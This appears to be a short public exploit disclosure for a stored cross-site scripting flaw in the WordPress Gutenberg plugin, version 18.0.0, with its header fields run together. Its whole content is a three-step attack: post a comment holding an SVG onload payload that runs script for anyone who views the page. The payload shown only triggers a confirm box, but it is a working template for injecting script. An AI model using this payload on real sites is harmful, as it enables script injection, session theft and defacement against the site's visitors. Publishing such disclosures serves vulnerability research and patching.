    ## Exploit Title: Wordpress Gutenberg Plugin Version 18.0.0 Stored XSS### Date: 2024-3-29### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://wordpress.org/plugins/gutenberg/### Version 18.0.01 ) Go to Gutenberg Plugin edit page : https://127.0.0.1/WordPress/2024/03/29/welcome-to-the-gutenberg-editor/#comment-42 ) Write Leave a Reply  place your payload :<sVg/onLy=1 onLoaD=confirm(1)//3 ) After save will be see alert button

Tag

#wordpress